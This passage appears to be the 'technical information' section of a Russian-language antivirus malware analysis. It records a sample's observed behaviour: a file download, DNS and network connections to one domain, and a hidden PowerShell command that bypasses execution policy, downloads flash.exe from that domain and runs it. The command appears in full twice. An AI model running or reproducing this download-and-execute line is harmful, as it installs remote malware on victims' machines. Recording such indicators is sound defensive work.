Техническая информация
- http://huseyintabar.com/flash.exe как %temp%\flash.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://huseyintabar.com/flash.exe','%TEMP%\flash.exe'); Start-Process('%TEMP%\flash.exe')
- 'hu####ntabar.com':80
- http://hu####ntabar.com/flash.exe
- DNS ASK hu####ntabar.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://huseyintabar.com/flash.exe','%TEMP%\flash.exe'); Start-Process('%TEMP%\flash.exe')' (со скрытым окном)